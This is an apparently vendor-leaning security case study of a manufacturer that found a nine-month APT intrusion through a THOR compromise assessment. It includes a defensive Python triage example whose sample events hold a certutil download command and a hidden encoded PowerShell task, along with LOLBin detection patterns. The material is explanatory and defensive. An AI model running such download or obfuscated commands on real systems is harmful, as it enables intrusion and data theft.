22 January 2025

Case Study: Mid-Sized Manufacturer Detects APT After 9 Months – Thanks to THOR Scan

A machinery manufacturing company discovered during a routine compromise assessment with THOR that attackers had been active in their network undetected for 9 months. The case shows: EDR alone is not enough.

TL;DR

A machinery manufacturing company discovered during a routine compromise assessment with THOR from Nextron Systems that attackers had been active in their network undetected for 9 months. The APT group had exfiltrated design data and patent information. The case shows: EDR alone is not enough – regular compromise assessments are indispensable.

Initial Situation

The company is a specialist machinery manufacturer with 450 employees and locations in Germany, China, and the USA. The IT infrastructure was equipped with a well-known EDR product. There were no known security incidents.

As part of an NIS2 preparation measure, the company commissioned a service provider to conduct a compromise assessment. THOR Full was used in combination with Velociraptor for centralized control.

What THOR Found

The scan of 320 endpoints and 40 servers delivered several critical findings within 48 hours:

  • Modified Windows system files on three engineering workstations (YARA match with known APT toolset)
  • Anomalous scheduled tasks for persistent backdoor communication
  • Sigma hits in Windows event logs: suspicious lateral movement patterns spanning 9 months
  • Webshell on an internal web server used as a pivot point

Why the EDR Did Not Detect the Attack

The attackers used living-off-the-land techniques (LOLBins), i.e. legitimate Windows tools such as PowerShell, certutil, and wmic, for their activities. The EDR classified these executions as normal because the same tools frequently ran in the context of engineering software.

THOR, on the other hand, did not look for suspicious executions but for the artifacts left behind by the attackers: modified files, suspicious registry entries, and log traces.
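To make the artifact-based approach concrete, here is an added example (not THOR or Nextron code) that runs simple triage logic over a handful of constructed Windows Security event records: it flags scheduled-task and process-creation entries that pair a LOLBin with download or obfuscation arguments, accounts with network logons to several distinct hosts, and the minimum dwell time the evidence supports. Event IDs 4698, 4688 and 4624 are the real Windows IDs; hostnames, the account, the URL and timestamps are constructed.

```python
"""Artifact-style triage over constructed Windows event records (added example)."""
import re
from datetime import datetime

# Constructed sample events for this example; not real telemetry from the case.
EVENTS = [
    {"ts": "2024-04-03T08:12:00", "host": "ENG-WS-07", "id": 4698, "user": "j.mueller",
     "detail": r"C:\Windows\System32\certutil.exe -urlcache -split -f http://10.0.5.9/u.txt"},
    {"ts": "2024-04-03T08:12:30", "host": "ENG-WS-07", "id": 4688, "user": "j.mueller",
     "detail": r"C:\Program Files\CAD\cad.exe /project plant7"},  # benign engineering tool
    {"ts": "2024-06-11T22:41:00", "host": "FILESRV-01", "id": 4624, "user": "j.mueller", "detail": "LogonType=3"},
    {"ts": "2024-06-12T01:05:00", "host": "ENG-WS-12", "id": 4624, "user": "j.mueller", "detail": "LogonType=3"},
    {"ts": "2024-09-20T03:17:00", "host": "WEB-INT-02", "id": 4624, "user": "j.mueller", "detail": "LogonType=3"},
    {"ts": "2025-01-06T02:55:00", "host": "ENG-WS-12", "id": 4698, "user": "SYSTEM",
     "detail": "powershell.exe -WindowStyle Hidden -EncodedCommand REDACTED"},
]

LOLBIN_RE = re.compile(r"\b(certutil|wmic|powershell|pwsh)(\.exe)?\b", re.I)
# Download / obfuscation arguments that a legitimate engineering job rarely needs.
SUSPICIOUS_ARGS_RE = re.compile(r"(-urlcache|-enc\w*|/node:|-w(indowstyle)?\s+hidden)", re.I)


def lolbin_task_hits(events):
    """4698 (task created) or 4688 (process start) whose command pairs a LOLBin with suspicious args."""
    return [e for e in events if e["id"] in (4698, 4688)
            and LOLBIN_RE.search(e["detail"]) and SUSPICIOUS_ARGS_RE.search(e["detail"])]


def lateral_movement_hits(events, min_hosts=3):
    """Accounts with network logons (4624, LogonType 3) to at least min_hosts distinct hosts."""
    hosts = {}
    for e in events:
        if e["id"] == 4624 and "LogonType=3" in e["detail"]:
            hosts.setdefault(e["user"], set()).add(e["host"])
    return {u: sorted(h) for u, h in hosts.items() if len(h) >= min_hosts}


def dwell_time_days(hits):
    """Span between earliest and latest hit: the minimum dwell time the evidence supports."""
    if not hits:
        return 0
    stamps = [datetime.fromisoformat(e["ts"]) for e in hits]
    return (max(stamps) - min(stamps)).days


def triage(events):
    """Combine both detections and derive the dwell time from all contributing events."""
    lol = lolbin_task_hits(events)
    lat = lateral_movement_hits(events)
    lateral_events = [e for e in events if e["id"] == 4624 and e["user"] in lat]
    return {"lolbin": lol, "lateral": lat, "dwell_days": dwell_time_days(lol + lateral_events)}
```

On the constructed data the benign CAD process is ignored, both LOLBin entries and the three-host logon pattern are flagged, and the dwell time comes out at roughly nine months.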

Scope of Compromise

The forensic analysis revealed:

  • Initial access via a spear-phishing email to an engineer
  • Lateral movement across 5 systems over 9 months
  • Exfiltration of approximately 12 GB of design data and 3 patent applications
  • No destructive damage (espionage, not sabotage)

Lessons Learned

  • EDR does not detect everything; LOLBin-based APT activity in particular is often overlooked
  • Regular compromise assessments (at least semi-annually) find what EDR misses
  • THOR + Velociraptor is a cost-effective combination for enterprise scans
  • Engineering workstations are high-value targets and require special monitoring

Key Facts

Industry: Machinery manufacturing

Attacker dwell time: 9 months

Detection by: THOR Compromise Assessment

Exfiltrated data: 12 GB design data, 3 patent applications

EDR was installed but did not detect the APT

Fact: Mandiant estimates the average dwell time for APT attacks in 2024 at 10 days – but often over 200 days for undetected compromises.

Fact: According to CrowdStrike, the number of state-sponsored attacker groups has more than doubled since 2020 – to over 230 active groups worldwide.

Frequently Asked Questions

Why didn’t the EDR detect the APT?

The attackers used Living-off-the-Land techniques – legitimate Windows tools like PowerShell and certutil. EDR systems often do not recognize these as suspicious when they occur in the context of normal business processes.

How often should compromise assessments be conducted?

At least semi-annually for companies with a high risk profile. Additionally, after any suspected incident, during acquisitions (due diligence), and as a supplement to regular penetration tests.

Why do APT attacks remain undetected for so long?

APT groups use so-called Living-off-the-Land techniques, where they utilize legitimate system tools like PowerShell or WMI to move within the network. Since these tools are part of normal operations, they rarely trigger alarms. Only specialized compromise assessment tools like THOR detect the subtle traces of such attacks.


Header Image Source: Pexels / cottonbro studio


About the author: Tobias Massow

A magazine by Evernine Media GmbH